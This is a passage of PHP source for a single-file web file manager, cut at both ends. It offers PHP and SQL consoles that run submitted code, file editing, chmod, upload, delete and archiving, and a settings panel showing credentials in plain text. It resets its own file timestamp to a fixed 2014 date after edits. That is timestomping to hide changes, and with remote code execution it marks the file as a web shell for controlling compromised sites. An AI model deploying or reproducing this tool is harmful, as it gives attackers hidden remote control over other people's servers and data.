irAyrxhqwVqwDu4n1Y8+xdwQSgUXACTYEd0IgYR5BSFhMWE7YSKggHCQ0EdoJNwkDhFHCJyKTqEu0JroR+cQYYjIxh1hILCPWEo8TLxB7iEPENyQSiUMyJ7mQAkmxpFTSEtJG0m5SI+ksqZs0SBojk8naZGuyBzmULCAryIXkneTD5DPkG+Qh8lsKnWJAcaT4U+IoUspqShnlEOU05QZlmDJBVaOaUt2ooVQRNY9aQq2htlKvUYeoEzR1mjnNgxZJS6WtopXTGmgXaPdpr+h0uhHdlR5Ol9BX0svpR+iX6AP0dwwNhhWDx4hnKBmbGAcYZxl3GK+YTKYZ04sZx1QwNzHrmOeZD5lvVVgqtip8FZHKCpVKlSaVGyovVKmqpqreqgtV81XLVI+pXlN9rkZVM1PjqQnUlqtVqp1Q61MbU2epO6iHqmeob1Q/pH5Z/YkGWcNMw09DpFGgsV/jvMYgC2MZs3gsIWsNq4Z1gTXEJrHN2Xx2KruY/R27iz2qqaE5QzNKM1ezUvOUZj8H45hx+Jx0TgnnKKeX836K3hTvKeIpG6Y0TLkxZVxrqpaXllirSKtRq0frvTau7aedpr1Fu1n7gQ5Bx0onXCdHZ4/OBZ3nU9lT3acKpxZNPTr1ri6qa6UbobtEd79up+6Ynr5egJ5Mb6feeb3n+hx9L/1U/W36p/VHDFgGswwkBtsMzhg8xTVxbzwdL8fb8VFDXcNAQ6VhlWGX4YSRudE8o9VGjUYPjGnGXOMk423GbcajJgYmISZLTepN7ppSTbmmKaY7TDtMx83MzaLN1pk1mz0x1zLnm+eb15vft2BaeFostqi2uGVJsuRaplnutrxuhVo5WaVYVVpds0atna0l1rutu6cRp7lOk06rntZnw7Dxtsm2qbcZsOXYBtuutm22fWFnYhdnt8Wuw+6TvZN9un2N/T0HDYfZDqsdWh1+c7RyFDpWOt6azpzuP33F9JbpL2dYzxDP2DPjthPLKcRpnVOb00dnF2e5c4PziIuJS4LLLpc+Lpsbxt3IveRKdPVxXeF60vWdm7Obwu2o26/uNu5p7ofcn8w0nymeWTNz0MPIQ+BR5dE/C5+VMGvfrH5PQ0+BZ7XnIy9jL5FXrdewt6V3qvdh7xc+9j5yn+M+4zw33jLeWV/MN8C3yLfLT8Nvnl+F30N/I/9k/3r/0QCngCUBZwOJgUGBWwL7+Hp8Ib+OPzrbZfay2e1BjKC5QRVBj4KtguXBrSFoyOyQrSH355jOkc5pDoVQfujW0Adh5mGLw34MJ4WHhVeGP45wiFga0TGXNXfR3ENz30T6RJZE3ptnMU85ry1KNSo+qi5qPNo3ujS6P8YuZlnM1VidWElsSxw5LiquNm5svt/87fOH4p3iC+N7F5gvyF1weaHOwvSFpxapLhIsOpZATIhOOJTwQRAqqBaMJfITdyWOCnnCHcJnIi/RNtGI2ENcKh5O8kgqTXqS7JG8NXkkxTOlLOW5hCepkLxMDUzdmzqeFpp2IG0yPTq9MYOSkZBxQqohTZO2Z+pn5mZ2y6xlhbL+xW6Lty8elQfJa7OQrAVZLQq2QqboVFoo1yoHsmdlV2a/zYnKOZarnivN7cyzytuQN5zvn//tEsIS4ZK2pYZLVy0dWOa9rGo5sjxxedsK4xUFK4ZWBqw8uIq2Km3VT6vtV5eufr0mek1rgV7ByoLBtQFr6wtVCuWFfevc1+1dT1gvWd+1YfqGnRs+FYmKrhTbF5cVf9go3HjlG4dvyr+Z3JS0qavEuWTPZtJm6ebeLZ5bDpaql+aXDm4N2dq0Dd9WtO319kXbL5fNKNu7g7ZDuaO/PLi8ZafJzs07P1SkVPRU+lQ27tLdtWHX+G7R7ht7vPY07NXbW7z3/T7JvttVAVVN1WbVZftJ+7P3P66Jqun4lvttXa1ObXHtxwPSA/0HIw6217nU1R3SPVRSj9Yr60cOxx++/p3vdy0NNg1VjZzG4iNwRHnk6fcJ3/ceDTradox7rOEH0x92HWcdL2pCmvKaRptTmvtbYlu6T8w+0dbq3nr8R9sfD5w0PFl5SvNUyWna6YLTk2fyz4ydlZ19fi753GDborZ752PO32oPb++6EHTh0kX/i+c7vDvOXPK4dPKy2+UTV7hXmq86X23qdOo8/pPTT8e7nLuarrlca7nuer21e2b36RueN87d9L158Rb/1tWeOT3dvfN6b/fF9/XfFt1+cif9zsu72Xcn7q28T7xf9EDtQdlD3YfVP1v+3Njv3H9qwHeg89HcR/cGhYPP/pH1jw9DBY+Zj8uGDYbrnjg+OTniP3L96fynQ89kzyaeF/6i/suuFxYvfvjV69fO0ZjRoZfyl5O/bXyl/erA6xmv28bCxh6+yXgzMV70VvvtwXfcdx3vo98PT+R8IH8o/2j5sfVT0Kf7kxmTk/8EA5jz/GMzLdsAAAAGYktHRAD/AP8A/6C9p5MAAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfcCAwGMhleGAKOAAAByElEQVQ4y8WTT2sUQRDFf9XTM+PGIBHdEEQR8eAfggaPHvTuyU+i+A38AF48efJbKB5zE0IMAVcCiRhQE8gmm111s9mZ3Zl+Hmay5qAY8GBDdTWPeo9HVRf872O9xVv3/JnrCygIU406K/qbrbP3Vxb/qjD8+OSNtC+VX6RiUyrWpXJD2aenfyR3Xs9N3h5rFIw6EAYQxsAIKMFx+cfSg0dmFk+qJaQyGu0tvwT2KwEZhANQWZGVg3LS83eupM2F5yiDkE9wDPZ762vQfVUJhIKQ7TDaW8TiacCO2lNnd6xjlYvpm49f5FuNZ+XBxpon5BTfWqSzN4AELAFLq+wSbILFdXgguoibUj7+vu0RKG9jeYHk6uIEXIosQZZiNWYuQSQQTWFuYEV3acXTfwdxitKrQAwumYiYO3JzCkVTyDWwsg+DVZR9YNTL3nqNDnHxNBq2f1mc2I1AgnAIRRfGbVQOamenyQ7ay74sI3z+FWWH9aiOrlCFBOaqqLoIyijw+YWHW9u+CKbGsIc0/s2X0bFpHMNUEuKZVQC/2x0mM00P8idfAAetz2ETwG5fa87PnosuhYBOyo8cttMJW+83dlv/tIl3F+b4CYyp2Txw2VUwAAAAAElFTkSuQmCC"); } .file { background-image: url("data:image/png;base64,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"); } <?=fm_home_style()?> .img { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAdFQTFRF7e3t/f39pJ+f+cJajV8q6enpkGIm/sFO/+2O393c5ubm/sxbd29yimdneFg65OTk2zoY6uHi1zAS1crJsHs2nygo3Nrb2LBXrYtm2p5A/+hXpoRqpKOkwri46+vr0MG36Ysz6ujpmI6AnzUywL+/mXVSmIBN8bwwj1VByLGza1ZJ0NDQjYSB/9NjwZ6CwUAsxk0brZyWw7pmGZ4A6LtdkHdf/+N8yow27b5W87RNLZL/2biP7wAA//GJl5eX4NfYsaaLgp6h1b+t/+6R68Fe89ycimZd/uQv3r9NupCB99V25a1cVJbbnHhO/8xS+MBa8fDwi2Ji48qi/+qOdVIzs34x//GOXIzYp5SP/sxgqpiIcp+/siQpcmpstayszSANuKKT9PT04uLiwIky8LdE+sVWvqam8e/vL5IZ+rlH8cNg08Ccz7ad8vLy9LtU1qyUuZ4+r512+8s/wUpL3d3dx7W1fGNa/89Z2cfH+s5n6Ojob1Yts7Kz19fXwIg4p1dN+Pj4zLR0+8pd7strhKAs/9hj/9BV1KtftLS1np2dYlJSZFVV5LRWhEFB5rhZ/9Jq0HtT//CSkIqJ6K5D+LNNblVVvjM047ZMz7e31xEG////tKgu6wAAAJt0Uk5T/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wCVVpKYAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAANZJREFUKFNjmKWiPQsZMMximsqPKpAb2MsAZNjLOwkzggVmJYnyps/QE59eKCEtBhaYFRfjZuThH27lY6kqBxYorS/OMC5wiHZkl2QCCVTkN+trtFj4ZSpMmawDFBD0lCoynzZBl1nIJj55ElBA09pdvc9buT1SYKYBWw1QIC0oNYsjrFHJpSkvRYsBKCCbM9HLN9tWrbqnjUUGZG1AhGuIXZRzpQl3aGwD2B2cZZ2zEoL7W+u6qyAunZXIOMvQrFykqwTiFzBQNOXj4QKzoAKzajtYIQwAlvtpl3V5c8MAAAAASUVORK5CYII="); } @media screen and (max-width:720px){ table{display:block;} #fm_table td{display:inline;float:left;} #fm_table tbody td:first-child{width:100%;padding:0;} #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;} #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;} #fm_table tr{display:block;float:left;clear:left;width:100%;} #header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;} #header_table table td {display:inline;float:left;} } </style> </head> <body> <?php $url_inc = '?fm=true'; if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){ $res = empty($_POST['sql']) ? '' : $_POST['sql']; $res_lng = 'sql'; } elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){ $res = empty($_POST['php']) ? '' : $_POST['php']; $res_lng = 'php'; } if (isset($_GET['fm_settings'])) { echo ' <table class="whole"> <form method="post" action=""> <tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr> '.(empty($msg)?'':'<tr><td class="row2" colspan="2">'.$msg.'</td></tr>').' '.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').' '.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').' '.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').' '.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').' '.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').' '.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').' '.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').' '.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').' '.fm_config_checkbox_row(__('Show').' xls','show_xls').' '.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').' '.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').' <tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr> <tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr> <tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr> <tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr> '.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').' '.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').' '.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').' '.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').' '.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').' <tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr> </form> </table> <table> <form method="post" action=""> <tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr> <tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr> <tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr> <tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr> <tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr> <tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr> <tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr> </form> </table>'; echo fm_tpl_form('php'),fm_tpl_form('sql'); } elseif (isset($proxy_form)) { die($proxy_form); } elseif (isset($res_lng)) { ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php'); else echo '</h2></td><td>'.fm_run_input('sql'); ?></td></tr></table></td> </tr> <tr> <td class="row1"> <a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a> <form action="" method="POST" name="console"> <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/> <input type="reset" value="<?=__('Reset')?>"> <input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run"> <?php $str_tmpl = $res_lng.'_templates'; $tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : ''; if (!empty($tmpl)){ $active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : ''; $select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n"; $select .= '<option value="-1">' . __('Select') . "</option>\n"; foreach ($tmpl as $key=>$value){ $select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n"; } $select .= "</select>\n"; echo $select; } ?> </form> </td> </tr> </table> <?php if (!empty($res)) { $fun='fm_'.$res_lng; echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>'; } } elseif (!empty($_REQUEST['edit'])){ if(!empty($_REQUEST['save'])) { $fn = $path . $_REQUEST['edit']; $filemtime = filemtime($fn); if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated'); else $msg .= __('Error occurred'); if ($_GET['edit']==basename(__FILE__)) { touch(__FILE__,1415116371); } else { if (!empty($fm_config['restore_time'])) touch($fn,$filemtime); } } $oldcontent = @file_get_contents($path . $_REQUEST['edit']); $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table border='0' cellspacing='0' cellpadding='1' width="100%"> <tr> <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$editlink?>"> <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea> <input type="submit" name="save" value="<?=__('Submit')?>"> <input type="submit" name="cancel" value="<?=__('Cancel')?>"> </form> </td> </tr> </table> <?php echo $auth['script']; } elseif(!empty($_REQUEST['rights'])){ if(!empty($_REQUEST['save'])) { if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively'])) $msg .= (__('File updated')); else $msg .= (__('Error occurred')); } clearstatcache(); $oldrights = fm_rights_string($path . $_REQUEST['rights'], true); $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>"> <?php if (is_dir($path.$_REQUEST['rights'])) { ?> <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/> <?php } ?> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') { if(!empty($_REQUEST['save'])) { rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']); $msg .= (__('File updated')); $_REQUEST['rename'] = $_REQUEST['newname']; } clearstatcache(); $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } else { //Let's rock! $msg = ''; if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) { if(!empty($_FILES['upload']['name'])){ $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']); if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){ $msg .= __('Error occurred'); } else { $msg .= __('Files uploaded').': '.$_FILES['upload']['name']; } } } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') { if(!fm_del_files(($path . $_REQUEST['delete']), true)) { $msg .= __('Error occurred'); } else { $msg .= __('Deleted').' '.$_REQUEST['delete']; } } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) { if(!@mkdir($path . $_REQUEST['dirname'],0777)) { $msg .= __('Error occurred'); } else { $msg .= __('Created').' '.$_REQUEST['dirname']; } } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) { if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) { $msg .= __('Error occurred'); } else { fclose($fp); $msg .= __('Created').' '.$_REQUEST['filename']; } } elseif (isset($_GET['zip'])) { $source = base64_decode($_GET['zip']); $destination = basename($source).'.zip'; set_time_limit(0); $phar = new PharData($destination); $phar->buildFromDirectory($source); if (is_file($destination)) $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>'; else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['gz'])) { $source = base64_decode($_GET['gz']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); clearstatcache(); set_time_limit(0); //die(); $phar = new PharData($destination); $phar->buildFromDirectory($source); $phar->compress(Phar::GZ,'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['decompress'])) { // $source = base64_decode($_GET['decompress']); // $destination = basename($source); // $ext = end(explode(".", $destination)); // if ($ext=='zip' OR $ext=='gz') { // $phar = new PharData($source); // $phar->decompress(); // $base_file = str_replace('.'.$ext,'',$destination); // $ext = end(explode(".", $base_file)); // if ($ext=='tar'){ // $phar = new PharData($base_file); // $phar->extractTo(dir($source)); // } // } // $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done'); } elseif (isset($_GET['gzfile'])) { $source = base64_decode($_GET['gzfile']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); set_time_limit(0); //echo $destination; $ext_arr = explode('.',basename($source)); if (isset($ext_arr[1])) { unset($ext_arr[0]); $ext=implode('.',$ext_arr); } $phar = new PharData($destination); $phar->addFile($source); $phar->compress(Phar::GZ,$ext.'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } ?> <table class="whole" id="header_table" > <tr> <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th> </tr> <?php if(!empty($msg)){ ?> <tr> <td colspan="2" class="row2"><?=$msg?></td> </tr> <?php } ?> <tr> <td class="row2"> <table> <tr> <td> <?=fm_home()?> </td> <td> <?php if(!empty($fm_config['make_directory'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="dirname" size="15"> <input type="submit" name="mkdir" value="<?=__('Make directory')?>"> </form> <?php } ?> </td> <td> <?php 